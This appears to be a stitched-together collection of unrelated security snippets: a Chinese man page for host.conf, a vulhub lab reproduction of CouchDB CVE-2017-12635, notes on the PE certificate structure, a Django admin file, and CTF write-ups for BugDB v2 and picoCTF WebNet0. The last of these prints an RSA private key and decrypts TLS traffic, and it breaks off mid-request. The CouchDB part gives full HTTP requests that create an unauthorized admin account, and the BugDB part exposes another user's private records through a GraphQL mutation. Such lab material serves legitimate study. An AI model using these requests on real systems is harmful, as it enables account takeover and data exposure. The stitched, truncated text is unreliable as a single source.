.\" 版权所有(c) 1997 Martin Schulze (joey@infodrom.north.de) .\" 中文版版权所有 riser,www.linuxforum.net 2000 .\" .\" 这是免费的文档; .\" 你可以遵照自由软件基金会出版的 GNU 通用出版许可版本 2 .\" 或者更高版本的条例来重新发布和/或修改它. .\" .\" GNU通用出版许可中涉及到的"目标代码 (object code) "和" 可执行程序 .\" (executables)"可解释为任意文档格式化的输出或者排版系统, .\" 包括中间的和已输出的结果. .\" .\" 该文档的发布寄望于能够实用,但并不做任何担保; .\" 甚至也不提供隐含的商品性的保证或者针对特殊目的适用性. .\" 参见GNU通用版权许可以获知详情. .\" .\" 你应该接收到与本文档一同发布的GNU通用版权许可的副本; .\" 如果没有,请写信到自由软件基金会 .\" (Free Software Foundation), Inc., 675 Mass Ave, Cambridge, MA 02139, USA. .\" .\" 许多文本复制于resolv+(8)的手册页. .TH HOST.CONF 5 "1997年2月2日" "Debian/GNU Linux" "(Linux系统管理)" .SH NAME (名称) host.conf \- 解析配置文件 .SH DESCRIPTION (描述) 文件 .I /etc/host.conf 包含了为解析库声明的配置信息. 它应该每行含一个配置关键字, 其后跟着合适的配置信息. 系统识别的关键字有: .IR order ", " trim ", " multi ", " nospoof "和 " reorder. 每个关键字在下面将分别进行介绍: .TP .I order 这个关键字确定了主机查询是如何执行的. 它后面应该跟随一个或者更多的查询方式, 这些查询方式用逗号分隔. 有效的方式有: .IR bind ", " hosts "和 " nis . .TP .I trim 这个关键字可以多次出现. 每次出现其后应该跟随单个的以句点开头的域名. 如果设置了它, resolv+ 库会自动截去任何通过 DNS 解析出来的主机名后面的域名. 这个选项用于本地主机和域. (相关信息: trim 对于通过 NIS 或者 hosts 文件获取的主机名无效. 需要注意的是要确保在 hosts 文件中的每条记录的 第一个主机名是全名或者非全名, 以适合于本地安装.) .TP .I multi 有效的值为: .IR on "和 "off . 如果设置为 .IR on , resolv+ 库会返回一台主机在 .I /etc/hosts 文件中出现的的所有有效地址, 而不只是第一个. 默认情况下设为 .I off , 否则可能会导致拥有庞大 hosts 文件的站点潜在的性能损失. .TP .I nospoof 有效的值为: .IR on " 和 "off . 如果设置为 .IR on , resolv+ 库会尝试阻止主机名欺骗以提高使用 .BR rlogin " 和 "rsh 的安全性. 它是如下这样工作的: 在执行了一个主机地址的查询之后, resolv+ 会对该地址执行一次主机名的查询. 如果两者不匹配, 查询即失败. .TP .I spoofalert 如果该选项设为 .I on 同时也设置了 .I nospoof 选项, resolv+ 会通过 syslog 设施记录错误报警信息. 默认的值为 .IR off . .TP .I reorder 有效的值为 .IR on " 和 "off . 如果设置为 .IR on , resolv+ 会试图重新排列主机地址, 以便执行 .BR gethostbyname (3) 时, 首先列出本地地址(即在同一子网中的地址). 重新排序适合于所有查询方式. 默认的值为 .IR off . .SH FILES(相关文件) .TP .I /etc/host.conf 解析配置文件 .TP .I /etc/resolv.conf 解析配置文件 .TP .I /etc/hosts 本地主机数据库 .SH SEE ALSO(又见) .BR gethostbyname (3), .BR hostname (7), .BR resolv+ (8), .BR named (8) .SH "[中文版维护人]" .B riser <boomer@ccidnet.com> .SH "[中文版最新更新]" .B 2000/11/26 .SH "《中国linux论坛man手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
# Couchdb 垂直权限绕过漏洞(CVE-2017-12635) Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。 影响版本:小于 1.7.0 以及 小于 2.1.1 参考链接: - http://bobao.360.cn/learning/detail/4716.html - https://justi.cz/security/2017/11/14/couchdb-rce-npm.html ## 测试环境 编译及启动环境: ``` docker compose build docker compose up -d ``` 环境启动后,访问`http://your-ip:5984/_utils/`即可看到一个web页面,说明Couchdb已成功启动。但我们不知道密码,无法登陆。 ## 漏洞复现 首先,发送如下数据包: ``` PUT /_users/org.couchdb.user:vulhub HTTP/1.1 Host: your-ip:5984 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 90 { "type": "user", "name": "vulhub", "roles": ["_admin"], "password": "vulhub" } ``` 可见,返回403错误:`{"error":"forbidden","reason":"Only _admin may set roles"}`,只有管理员才能设置Role角色: ![](1.png) 发送包含两个roles的数据包,即可绕过限制: ``` PUT /_users/org.couchdb.user:vulhub HTTP/1.1 Host: your-ip:5984 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 108 { "type": "user", "name": "vulhub", "roles": ["_admin"], "roles": [], "password": "vulhub" } ``` 成功创建管理员,账户密码均为`vulhub`: ![](2.png) 再次访问`http://your-ip:5984/_utils/`,输入账户密码`vulhub`,可以成功登录: ![](3.png)
sec-knowleage
# 签名 --- ## 数字签名结构 ```c++ typedef struct _WIN_CERTIFICATE { DWORD dwLength; WORD wRevision; WORD wCertificateType; // WIN_CERT_TYPE_xxx BYTE bCertificate[ANYSIZE_ARRAY]; } WIN_CERTIFICATE, *LPWIN_CERTIFICATE; ``` * dwLength: 此结构体的长度。 * wRevision : 在 bCertificate 里面保护的证书的版本号,版本号有两种,如下表,一般为 0x0200。 | 值 | 信息 | Win32 SDK中的宏定义名 | | - | - | - | | 0x0100 | Win_Certificate的老版本 | WIN_CERT_REVISION_1_0 | | 0x0200 | Win_Certificate的当前版本 | WIN_CERT_REVISION_2_0 | * wCertificateType:证书类型,有如下表格中的类型: | 值 | 信息 | Win32 SDK中的宏定义名 | | - | - | - | | 0x0001 | X.509证书 | WIN_CERT_TYPE_X509 | | 0x0002 | 包含PKCS#7的SignedData的结构 | WIN_CERT_TYPE_PKCS_SIGNED_DATA | | 0x0003 | 保留 | WIN_CERT_TYPE_RESERVED_1 | | 0x0004 | 终端服务器协议堆栈证书签名 | WIN_CERT_TYPE_TS_STACK_SIGNED | * bCertificate:包含一个或多个证书,一般来说这个证书的内容一直到安全表的末尾。bCertificate的字节大小要求8字节对齐。
sec-knowleage
from django.contrib import admin from .models import Collection, Collection2 # Register your models here. admin.site.register(Collection) admin.site.register(Collection2)
sec-knowleage
# BugDB v2 - FLAG0 ## 0x00 Overview Pretty much same as [BugDB v1][1]. There is only a tiny difference on mutate the data. ## 0x01 Take a Tour ### allUsers Users no longer have their bugs. ```graphql query{ allUsers { edges { node { id username } } } } ``` ![](./imgs/allUsers.jpg) ### allBugs There is only one bug in array. And the one shows NOT PRIVATE status. ```graphql query{ allBugs { id reporter { id username } reporterId text private } } ``` ![](./imgs/allBugs.jpg) And the bug id can be [decoded][2] ``` base64decode(QnVnczox) = Bugs:1 ``` ### mutation Try modify Bugs:2 ```graphql mutation{ modifyBug(id:2, private:false) { ok } } ``` ![](./imgs/mutation.jpg) ## 0x02 FLAG Go check back allBugs again. ```graphql query{ allBugs { id reporter { id username } reporterId text private } } ``` Get the FLAG ![](./imgs/flag.jpg) [1]: ../../bugdb_v1/flag0 [2]: https://www.base64decode.org/
sec-knowleage
# WebNet0 Forensics, 350 points ## Description: > We found this packet capture and key. Recover the flag. ## Solution: We receive a network capture: ```console root@kali:/media/sf_CTFs/pico/WebNet0# tshark -r capture.pcap Running as user "root" and group "root". This could be dangerous. 1 0.000000 128.237.140.23 → 172.31.22.220 TCP 78 57567 → 443 [SYN] Seq=0 Win=65535 Len=0 MSS=1386 WS=64 TSval=132865167 TSecr=0 SACK_PERM=1 57567 443 2 0.000029 172.31.22.220 → 128.237.140.23 TCP 74 443 → 57567 [SYN, ACK] Seq=0 Ack=1 Win=26847 [TCP CHECKSUM INCORRECT] Len=0 MSS=8961 SACK_PERM=1 TSval=568332748 TSecr=132865167 WS=128 443 57567 3 0.025161 128.237.140.23 → 172.31.22.220 TCP 78 57578 → 443 [SYN] Seq=0 Win=65535 Len=0 MSS=1386 WS=64 TSval=132865192 TSecr=0 SACK_PERM=1 57578 443 4 0.025171 172.31.22.220 → 128.237.140.23 TCP 74 443 → 57578 [SYN, ACK] Seq=0 Ack=1 Win=26847 [TCP CHECKSUM INCORRECT] Len=0 MSS=8961 SACK_PERM=1 TSval=568332773 TSecr=132865192 WS=128 443 57578 5 0.028804 128.237.140.23 → 172.31.22.220 TCP 66 57567 → 443 [ACK] Seq=1 Ack=1 Win=131904 Len=0 TSval=132865195 TSecr=568332748 57567 443 6 0.028881 128.237.140.23 → 172.31.22.220 TLSv1 583 Client Hello 57567 443 7 0.028902 172.31.22.220 → 128.237.140.23 TCP 66 443 → 57567 [ACK] Seq=1 Ack=518 Win=28032 [TCP CHECKSUM INCORRECT] Len=0 TSval=568332777 TSecr=132865195 443 57567 8 0.029538 172.31.22.220 → 128.237.140.23 TLSv1.2 1073 Server Hello, Certificate, Server Hello Done 443 57567 9 0.053871 128.237.140.23 → 172.31.22.220 TCP 66 57578 → 443 [ACK] Seq=1 Ack=1 Win=131904 Len=0 TSval=132865219 TSecr=568332773 57578 443 10 0.058387 128.237.140.23 → 172.31.22.220 TLSv1 583 Client Hello 57578 443 11 0.058417 172.31.22.220 → 128.237.140.23 TCP 66 443 → 57578 [ACK] Seq=1 Ack=518 Win=28032 [TCP CHECKSUM INCORRECT] Len=0 TSval=568332806 TSecr=132865222 443 57578 12 0.058429 128.237.140.23 → 172.31.22.220 TCP 66 57567 → 443 [ACK] Seq=518 Ack=1008 Win=130880 Len=0 TSval=132865222 TSecr=568332777 57567 443 13 0.058743 172.31.22.220 → 128.237.140.23 TLSv1.2 1073 Server Hello, Certificate, Server Hello Done 443 57578 14 0.059645 128.237.140.23 → 172.31.22.220 TLSv1.2 384 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message 57567 443 15 0.061383 172.31.22.220 → 128.237.140.23 TLSv1.2 324 New Session Ticket, Change Cipher Spec, Encrypted Handshake Message 443 57567 16 0.088416 128.237.140.23 → 172.31.22.220 TCP 66 57578 → 443 [ACK] Seq=518 Ack=1008 Win=130880 Len=0 TSval=132865247 TSecr=568332806 57578 443 17 0.092408 128.237.140.23 → 172.31.22.220 TCP 78 57581 → 443 [SYN] Seq=0 Win=65535 Len=0 MSS=1386 WS=64 TSval=132865249 TSecr=0 SACK_PERM=1 57581 443 18 0.092423 172.31.22.220 → 128.237.140.23 TCP 74 443 → 57581 [SYN, ACK] Seq=0 Ack=1 Win=26847 [TCP CHECKSUM INCORRECT] Len=0 MSS=8961 SACK_PERM=1 TSval=568332840 TSecr=132865249 WS=128 443 57581 19 0.092429 128.237.140.23 → 172.31.22.220 TLSv1.2 384 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message 57578 443 20 0.093713 128.237.140.23 → 172.31.22.220 TCP 66 57567 → 443 [ACK] Seq=836 Ack=1266 Win=130752 Len=0 TSval=132865252 TSecr=568332809 57567 443 21 0.094104 172.31.22.220 → 128.237.140.23 TLSv1.2 324 New Session Ticket, Change Cipher Spec, Encrypted Handshake Message 443 57578 22 0.122048 128.237.140.23 → 172.31.22.220 TCP 66 57581 → 443 [ACK] Seq=1 Ack=1 Win=131904 Len=0 TSval=132865276 TSecr=568332840 57581 443 23 0.122203 128.237.140.23 → 172.31.22.220 TLSv1 583 Client Hello 57581 443 24 0.122220 172.31.22.220 → 128.237.140.23 TCP 66 443 → 57581 [ACK] Seq=1 Ack=518 Win=28032 [TCP CHECKSUM INCORRECT] Len=0 TSval=568332870 TSecr=132865276 443 57581 25 0.122552 172.31.22.220 → 128.237.140.23 TLSv1.2 1073 Server Hello, Certificate, Server Hello Done 443 57581 26 0.123046 128.237.140.23 → 172.31.22.220 TCP 66 57578 → 443 [ACK] Seq=836 Ack=1266 Win=130752 Len=0 TSval=132865277 TSecr=568332842 57578 443 27 0.151669 128.237.140.23 → 172.31.22.220 TCP 66 57581 → 443 [ACK] Seq=518 Ack=1008 Win=130880 Len=0 TSval=132865303 TSecr=568332870 57581 443 28 0.152210 128.237.140.23 → 172.31.22.220 TLSv1.2 384 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message 57581 443 29 0.153206 172.31.22.220 → 128.237.140.23 TLSv1.2 324 New Session Ticket, Change Cipher Spec, Encrypted Handshake Message 443 57581 30 0.183385 128.237.140.23 → 172.31.22.220 TCP 66 57581 → 443 [ACK] Seq=836 Ack=1266 Win=130752 Len=0 TSval=132865334 TSecr=568332901 57581 443 31 0.187804 128.237.140.23 → 172.31.22.220 TLSv1.2 506 Application Data 57581 443 32 0.188303 172.31.22.220 → 128.237.140.23 TLSv1.2 1299 Application Data 443 57581 33 0.220287 128.237.140.23 → 172.31.22.220 TCP 66 57581 → 443 [ACK] Seq=1276 Ack=2499 Win=129792 Len=0 TSval=132865368 TSecr=568332936 57581 443 34 0.357102 128.237.140.23 → 172.31.22.220 TLSv1.2 521 Application Data 57567 443 35 0.357544 172.31.22.220 → 128.237.140.23 TLSv1.2 576 Application Data 443 57567 36 0.386999 128.237.140.23 → 172.31.22.220 TCP 66 57567 → 443 [ACK] Seq=1291 Ack=1776 Win=130560 Len=0 TSval=132865528 TSecr=568333105 57567 443 37 0.817074 128.237.140.23 → 172.31.22.220 TLSv1.2 438 Application Data 57567 443 38 0.817393 172.31.22.220 → 128.237.140.23 TLSv1.2 637 Application Data 443 57567 39 0.847407 128.237.140.23 → 172.31.22.220 TCP 66 57567 → 443 [ACK] Seq=1663 Ack=2347 Win=130496 Len=0 TSval=132865963 TSecr=568333565 57567 443 ``` And a key file: ```console root@kali:/media/sf_CTFs/pico/WebNet0# openssl rsa -in picopico.key -text RSA Private-Key: (2048 bit, 2 primes) modulus: 00:b0:2a:51:4f:34:a8:ec:78:91:79:a6:e0:89:53: 9c:77:f1:77:13:d5:e4:20:7b:9c:ce:28:d6:a1:02: 56:2e:76:f1:95:38:4b:3a:d5:39:c8:82:f7:04:47: 89:28:f2:2d:ce:0b:06:a4:db:f6:ad:70:69:37:a3: 3f:63:14:a7:a9:ed:71:44:60:d3:f7:d4:8c:30:0f: d8:ff:61:ac:e5:2b:2e:03:44:b1:8e:6c:ec:88:65: 45:35:7f:65:91:03:b5:21:7f:43:ce:41:7b:03:4f: 5a:14:5f:7d:a3:30:a6:64:41:24:83:5b:83:11:65: df:6d:ac:96:1d:3b:64:eb:70:43:cc:b0:18:99:42: 51:65:be:09:cd:c2:5d:d0:95:ac:28:cd:31:cb:00: 92:88:df:a8:f5:70:fc:12:30:c7:8d:71:ad:5e:d1: 98:b5:b3:b4:79:23:17:e1:a4:d5:ce:04:5d:05:9b: 18:96:be:67:8e:1d:b6:ac:a7:21:e0:f1:41:26:18: 1a:e4:77:89:38:c1:74:8a:19:0b:eb:73:c4:23:c9: c3:f8:49:c1:1d:aa:ec:49:89:89:c3:4f:c8:84:6c: 0a:bb:d3:fe:df:ff:93:48:37:50:c4:f5:8a:06:26: a2:98:8d:34:bd:9d:13:c1:e1:8b:e3:24:df:d2:26: 78:6f publicExponent: 65537 (0x10001) privateExponent: 08:29:dd:dc:ba:c6:fd:36:55:1f:7b:11:3a:ab:ea: 3b:50:b0:40:f6:0f:7d:45:dd:2d:5c:8d:1d:a6:fb: 11:6a:27:a5:cf:97:04:e1:ee:ac:91:0d:1b:60:a9: 45:81:7b:87:e9:d0:e4:00:e1:7c:86:12:0a:27:01: 7f:f8:ec:10:1e:d5:b9:e2:76:d0:2c:44:56:d1:d5: 2f:78:7a:47:a0:69:a0:73:25:7b:41:26:f0:e7:28: 7e:e3:29:74:bf:e4:3b:ea:26:dd:3f:01:91:54:b3: 0a:f0:a5:e4:d3:13:52:e0:05:ee:24:66:7d:7e:e8: 0c:b0:0b:c0:cd:08:cf:34:2f:da:e9:fe:d9:49:93: d7:9a:e0:01:97:e5:dc:82:f5:3c:6b:c9:85:b8:4b: c5:f7:9e:c8:f1:3d:30:1c:b5:4a:a0:63:43:da:cd: 16:7f:2c:42:ff:79:f4:9e:81:1f:3e:1b:12:92:bf: fc:4a:ed:34:fd:b2:87:ba:22:54:10:60:28:44:35: 80:4b:8e:8d:00:bf:e2:8c:68:a8:21:5f:65:a7:fd: 5c:d4:42:c4:1f:f3:63:59:d4:a6:bb:c9:cb:3d:3d: 34:c4:16:34:5d:84:9a:f9:81:54:67:e8:4f:19:ae: ba:de:4d:d0:66:d5:af:65:32:1f:15:8c:2a:6d:ac: 39 prime1: 00:e9:6f:6f:80:5a:05:a5:1a:d7:ad:b8:b2:89:7c: 9b:3c:76:77:7a:2e:19:da:7d:b2:82:39:73:0e:4f: af:2a:30:14:68:4e:90:6d:55:32:d1:55:23:6f:58: 29:bc:9b:84:d3:11:ac:d7:e3:e6:40:f9:b2:45:c1: 41:70:68:04:c3:98:77:2b:ea:53:08:de:d3:4a:ad: cb:27:63:61:7b:a3:92:38:cf:a9:b0:b9:1b:92:7a: cc:ea:fe:77:71:66:a0:b3:c0:2b:b8:9c:a8:b1:87: 77:33:9e:9e:e3:26:21:25:34:6d:1d:f0:bb:b9:79: 08:26:54:02:b5:02:15:97:7d prime2: 00:c1:31:af:60:6b:b5:49:50:fe:29:cd:c1:e7:58: 0a:22:df:83:a9:7e:3b:d0:61:e1:a5:20:a2:f7:00: a3:b8:39:e7:5a:1d:d1:fd:aa:27:78:d4:f4:07:9c: be:ce:df:1c:cd:eb:af:52:90:b6:79:b3:47:7c:f0: 0f:cb:14:b9:38:a1:93:4c:29:d9:12:4d:02:10:f8: 03:1b:5c:7d:35:1c:61:6f:9c:23:ae:3e:0f:c5:6c: da:75:c1:2e:f3:24:48:39:bb:91:c5:41:6c:8c:3c: d2:4b:af:f8:59:ea:0d:98:a7:e5:06:a4:07:06:4f: 03:3f:44:23:d5:00:f8:4b:5b exponent1: 00:c0:07:43:9a:3a:73:da:56:32:86:5e:21:c0:a8: 18:ab:ac:68:ac:c1:af:d2:e5:04:2b:cc:46:b1:c7: 2b:39:71:43:d8:6a:88:b4:e8:19:5d:ca:c3:d3:9c: 9a:f8:e4:96:67:6b:6a:dc:4e:45:e3:bd:84:c1:8d: 30:df:df:31:cc:15:68:33:60:17:de:7c:2f:24:87: c3:4f:2b:99:cd:b3:c9:5d:a2:b6:dd:01:e9:84:9e: 30:64:3f:e0:d2:10:b2:b2:2b:ab:cb:ba:53:ab:76: dc:c0:42:04:42:a7:e3:2c:4f:ec:53:6c:ed:80:ad: e7:de:5f:cd:ba:49:74:a9:a1 exponent2: 2d:af:9c:33:87:05:05:e3:7b:57:53:6b:09:54:4e: 81:54:ae:04:04:f0:0c:25:39:81:1d:28:ac:94:a0: 22:ce:be:a1:16:f0:33:b6:6b:43:2d:c8:cf:8c:07: ab:50:23:b5:a6:88:7d:53:ef:72:f4:2c:71:a5:2b: 76:f0:dd:a4:40:c1:5e:7f:7e:ef:ce:fa:30:1d:16: 4f:00:1e:33:d3:14:4f:9a:72:ed:9f:8b:87:3a:68: a6:f4:1a:30:31:62:4b:14:ca:32:05:78:af:e9:2a: 29:ef:e1:21:12:32:48:e9:5b:45:a8:c0:68:83:82: d7:11:3c:10:00:fc:b6:85 coefficient: 7c:43:35:ad:f3:34:bf:75:26:07:b3:d2:ea:ed:26: 3f:77:24:3f:60:85:09:d6:ab:c9:73:df:0b:9d:86: 05:c2:77:43:8e:98:a6:c4:2f:2d:35:68:b4:cf:ad: 78:7b:d3:8c:dc:36:8f:0c:19:c4:89:78:35:e9:c6: 48:48:f7:28:38:50:a0:e8:90:0b:d0:6b:0c:3f:83: 07:82:3d:f9:3f:67:c5:3d:e0:ed:1e:8c:ae:02:13: 82:10:78:59:ee:d3:56:12:ff:3e:58:e7:25:3c:83: aa:98:cd:03:89:18:4e:f7:80:24:fb:fa:5e:ad:44: 46:de:4f:52:d5:f7:06:a4 writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAsCpRTzSo7HiReabgiVOcd/F3E9XkIHuczijWoQJWLnbxlThL OtU5yIL3BEeJKPItzgsGpNv2rXBpN6M/YxSnqe1xRGDT99SMMA/Y/2Gs5SsuA0Sx jmzsiGVFNX9lkQO1IX9DzkF7A09aFF99ozCmZEEkg1uDEWXfbayWHTtk63BDzLAY mUJRZb4JzcJd0JWsKM0xywCSiN+o9XD8EjDHjXGtXtGYtbO0eSMX4aTVzgRdBZsY lr5njh22rKch4PFBJhga5HeJOMF0ihkL63PEI8nD+EnBHarsSYmJw0/IhGwKu9P+ 3/+TSDdQxPWKBiaimI00vZ0TweGL4yTf0iZ4bwIDAQABAoIBAAgp3dy6xv02VR97 ETqr6jtQsED2D31F3S1cjR2m+xFqJ6XPlwTh7qyRDRtgqUWBe4fp0OQA4XyGEgon AX/47BAe1bnidtAsRFbR1S94ekegaaBzJXtBJvDnKH7jKXS/5DvqJt0/AZFUswrw peTTE1LgBe4kZn1+6AywC8DNCM80L9rp/tlJk9ea4AGX5dyC9TxryYW4S8X3nsjx PTActUqgY0PazRZ/LEL/efSegR8+GxKSv/xK7TT9soe6IlQQYChENYBLjo0Av+KM aKghX2Wn/VzUQsQf82NZ1Ka7ycs9PTTEFjRdhJr5gVRn6E8ZrrreTdBm1a9lMh8V jCptrDkCgYEA6W9vgFoFpRrXrbiyiXybPHZ3ei4Z2n2ygjlzDk+vKjAUaE6QbVUy 0VUjb1gpvJuE0xGs1+PmQPmyRcFBcGgEw5h3K+pTCN7TSq3LJ2Nhe6OSOM+psLkb knrM6v53cWags8AruJyosYd3M56e4yYhJTRtHfC7uXkIJlQCtQIVl30CgYEAwTGv YGu1SVD+Kc3B51gKIt+DqX470GHhpSCi9wCjuDnnWh3R/aoneNT0B5y+zt8czeuv UpC2ebNHfPAPyxS5OKGTTCnZEk0CEPgDG1x9NRxhb5wjrj4PxWzadcEu8yRIObuR xUFsjDzSS6/4WeoNmKflBqQHBk8DP0Qj1QD4S1sCgYEAwAdDmjpz2lYyhl4hwKgY q6xorMGv0uUEK8xGsccrOXFD2GqItOgZXcrD05ya+OSWZ2tq3E5F472EwY0w398x zBVoM2AX3nwvJIfDTyuZzbPJXaK23QHphJ4wZD/g0hCysiury7pTq3bcwEIEQqfj LE/sU2ztgK3n3l/Nukl0qaECgYAtr5wzhwUF43tXU2sJVE6BVK4EBPAMJTmBHSis lKAizr6hFvAztmtDLcjPjAerUCO1poh9U+9y9CxxpSt28N2kQMFef37vzvowHRZP AB4z0xRPmnLtn4uHOmim9BowMWJLFMoyBXiv6Sop7+EhEjJI6VtFqMBog4LXETwQ APy2hQKBgHxDNa3zNL91Jgez0urtJj93JD9ghQnWq8lz3wudhgXCd0OOmKbELy01 aLTPrXh704zcNo8MGcSJeDXpxkhI9yg4UKDokAvQaww/gweCPfk/Z8U94O0ejK4C E4IQeFnu01YS/z5Y5yU8g6qYzQOJGE73gCT7+l6tREbeT1LV9wak -----END RSA PRIVATE KEY----- ``` We have three streams in this capture file: ```console root@kali:/media/sf_CTFs/pico/WebNet0# tshark -r capture.pcap -T fields -e tcp.stream | sort -u Running as user "root" and group "root". This could be dangerous. 0 1 2 ``` However, they are encrypted and we can't view their contents without the appropriate key: ```console root@kali:/media/sf_CTFs/pico/WebNet0# tshark -r capture.pcap -qz follow,tcp,ascii,0 Running as user "root" and group "root". This could be dangerous. =================================================================== Follow: tcp,ascii Filter: tcp.stream eq 0 Node 0: 128.237.140.23:57567 Node 1: 172.31.22.220:443 517 ................>..}............O]Ee.d..N....r.0.,.(.$... .......k.i.h.9.7.6.2...*.&.......=.5./.+.'.#...........g.?.>.3.1.0.1.-.).%.......<./......... .....a...7.5..2ec2-18-223-184-200.us-east-2.compute.amazonaws.com......... ..................... . ...................................................................................................................................................................................................................................................... 1007 .....0\1.0...U....US1.0...U....Michigan1.0...U....Kalamazoo1.0...U.......0...0..........R..&j.....>Lf....$..0 ..Pico CTF1.0...U... 200811154129Z0\1.0...U....US1.0...U....Michigan1.0...U....Kalamazoo1.0...U. ..Pico CTF1.0...U... ..........0.."0 ......*QO4..x.y...S.w.w... {..(...V.v..8K:.9....G.(.-.......pi7.?c....qD`....0...a..+..D..l..eE5.e...!.C.A{.OZ._}.0.dA$.[..e.m...;d.pC....BQe....]...(.1.......p..0..q.^.....y#......].....g.....!..A&...w.8.t....s.#...I....I...O..l mo...E...yN.d...p..[m.b...zq........:...Ij..Q..L&........%...r..gJ6.29.T".*8..n....n.~+*...J.6.....yG...".7}...oO...k..G[3.-.8.(.gq."..(...... .....0&..9s...C.p....~.Qv............y.E...A]... \.D.2=C.c. ..B..m.r&......... 318 ..g'\S.G#(.....t.(1Z9.PMB...;p.^#...PS..]....y|......mc.Vb..N....B[...._...nES.... .;p.0.|O..f.u..F.5id4..1 g..\.....X.f........C....2=eH.J&.ib.G.9....k;G.-.M.9 ..c#H.R..&.n..~.L.4.Hk........g.{rv....~_.....j..-..4vJ..h......_.CA..%7g...........(...B.r..zZ)..w.PRFD..:..z.DC.X>.O...F.#J 258 ........w........(I62.........}.Ja#.Fx.7.Z..G.!..o.F..;..^T.L...K..8.....i.E...=F. .P......j...."$...7.#.g.dd..s.=...V._.....I0R.....9|..........#=,..xI.K..Qx.[v.__c... .-3..s...xTM..q.*............(..5.]fc....s. .F.O.........7s...~....-.. 455 ;E.....*.+*.<.B.1.n..sG+N........}.W.7....[?..+.k....J.P...Y....m.... .@(.k.....N%.......k ...v........y.Q.K&.i.s.. .b.`.i..Z/...`wpY.H...<.]W=.....@...L(O<.2-1aou.:.r...-....2!.Vv.`.D.YR..1y. =W...f.|.$...A......eZ-G...G.#e..[.w6-U..O.P&..&.......H..9..[......3g.e...~.[...4 t_.Z.r...7......../e.g<.....%.&>..C..p3.M.:..Z....,u........8>..P..9.K.$..8.*.....?..~2|p..i=e,..a..i..l...fHDMg.*7Z...uK..S. 510 .......5.]fc.....G.....W.j.I..x..;.*.D~X.lX.9eY.@f...XG.f...|.k.l....$3..:g..Y..)e}....?K'.......J...]X.;7..cw.....$.PX..._)7...P]..B..$........xK..O...3..~G..G..Tz...c6.O...*.5....QT...f...s.h....[B.~..|...G..a.L.8.u..@.2....<9.J...r#.......5:i.Y .fG. .._...d..."*.1([^..........K....6"..Y....v...........v.3iL....0E..z~#....b|..]%P.o. M..l......6..XkCw.i..........O...;..A.....1b...................:..gp....v4.5......Kf.......QK.--.~X...6...@..`..$..v......9.'scC?.5k U.....\.....;L".w.nebd.V%......"....+m.. 372 ....o...B.r....._aa.....M..&.M..o.. .y=*y.....5.L.lm4......-.*.'H3H..OQS...'.._.:5".L.. 4) 4..Nt.e.6.....NO..X.^.>.hA.:.....%.=............= J~HH9.......`m..*.G...RdA....`vOo.^...#...~.X.......v../z....]/*L..]-..GX.... .E...-4.......K........R.*.w...w.........&..\ ]@ns.......\...M2...geM.) ...tN.....D.....|...{...P..entoxo...%..po.O..Z{ 571 ....6..5.]fc....,.T=..u..v..0G.?....!am...+.g(5O].4\.o..(.|G...X......Hr...._...j5..{..j..W.!.,}7.....w.u0Y... 7.....)....U...T1.8r..#..$Zx.q.r..1?.b...`.;..0..h...I..t.d.V......&..-.S6(.3....q.B..t%...... ..LkpN..\B.FH(=JW....w..N..8.[`.:.Z....YxK..#..f....r.W......\....w..^....$.O.....T..KGW..O...`0..t.....J.lIMq..'..7...s....a......n......9.F...Q1...}..K.q)Ex..........U?.th.w. g...u8.6.y.'.gV..z.UO.}E...?>. =================================================================== root@kali:/media/sf_CTFs/pico/WebNet0# tshark -r capture.pcap -qz follow,ssl,ascii,0 Running as user "root" and group "root". This could be dangerous. =================================================================== Follow: ssl,ascii Filter: tcp.stream eq 0 Node 0: :0 Node 1: :0 =================================================================== ``` Let's use the private key in order to decrypt the TLS layer and view the contents: ```console root@kali:/media/sf_CTFs/pico/WebNet0# tshark -r capture.pcap -o "ssl.debug_file:ssldebug.log" -o "ssl.desegment_ssl_records: TRUE" -o "ssl.desegment_ssl_application_data: TRUE" -o "ssl.keys_list:172.31.22.220,443,http,picopico.key" -qz follow,ssl,ascii,0 Running as user "root" and group "root". This could be dangerous. =================================================================== Follow: ssl,ascii Filter: tcp.stream eq 0 Node 0: 128.237.140.23:57567 Node 1: :0 426 GET /starter-template.css HTTP/1.1 Host: ec2-18-223-184-200.us-east-2.compute.amazonaws.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/css,*/*;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://ec2-18-223-184-200.us-east-2.compute.amazonaws.com/ Pragma: no-cache Cache-Control: no-cache 481 HTTP/1.1 200 OK Date: Fri, 23 Aug 2019 15:56:36 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Mon, 12 Aug 2019 16:47:05 GMT ETag: "62-58fee462bf227-gzip" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Pico-Flag: picoCTF{nongshim.shrimp.crackers} Content-Length: 100 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/css ..........K.O.T..RP(HLI..K.-./.R0-J......+.I,*I-.-I.-.I,IEVj.`.T.`..Q..P.ZQ......g.......2.. ...b... 343 GET /favicon.ico HTTP/1.1 Host: ec2-18-223-184-200.us-east-2.compute.amazonaws.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: image/webp,*/* Accept-Language: 